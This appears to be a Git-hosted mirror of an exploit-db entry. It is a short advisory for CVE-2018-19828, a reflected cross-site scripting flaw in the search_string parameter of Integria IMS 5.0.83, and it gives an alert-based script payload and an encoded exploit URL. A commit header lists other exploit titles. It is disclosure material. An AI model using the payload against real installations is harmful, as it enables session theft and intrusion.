bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/46012.txt
Offensive Security aedf107ce9 DB: 2018-12-20 
12 changes to exploits/shellcodes

MiniShare Server 1.3.2 - Remote Denial of Service
MiniShare 1.3.2 - Remote Denial of Service

MiniShare 1.5.5 - Local Buffer Overflow (SEH)
MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH)
Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure
PassFab RAR 9.3.2 - Buffer Overflow (SEH)
LanSpy 2.0.1.159 - Local Buffer Overflow
PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)

MiniShare HTTP 1.5.5 - Remote Buffer Overflow
MiniShare 1.5.5 - Remote Buffer Overflow

MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)
Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)
Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting
Integria IMS 5.0.83 - Cross-Site Request Forgery
Bolt CMS < 3.6.2 - Cross-Site Scripting
Yeswiki Cercopitheque - 'id' SQL Injection
IBM Operational Decision Manager 8.x - XML External Entity Injection

Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)
2018-12-20 05:01:43 +00:00

27 lines
No EOL
1 KiB
Text
Raw Blame History

# Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-12-18
# Google Dork: N/A
# Vendor: Artica ST
# Software Link: https://github.com/articaST/integriaims
# Affected Version: 5.0.83 and possibly before
# Patched Version: 5.0.84
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-19828
# References:
# https://hackpuntes.com/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/
# https://github.com/articaST/integriaims/commit/25d810b1c8e138e4b47d5cd14b2cd9b564f19b1e
# 1. Technical Description:
# search_string parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks
# through a GET request in index.php resource.
# 2. Proof Of Concept (PoC):
# On the main page, go to the search form and add the following payload
# '><script>alert('PoC CVE-2018-19828')</script>
# 3. Payload
# http://[PATH]/index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E
Reference in a new issue View git blame Copy permalink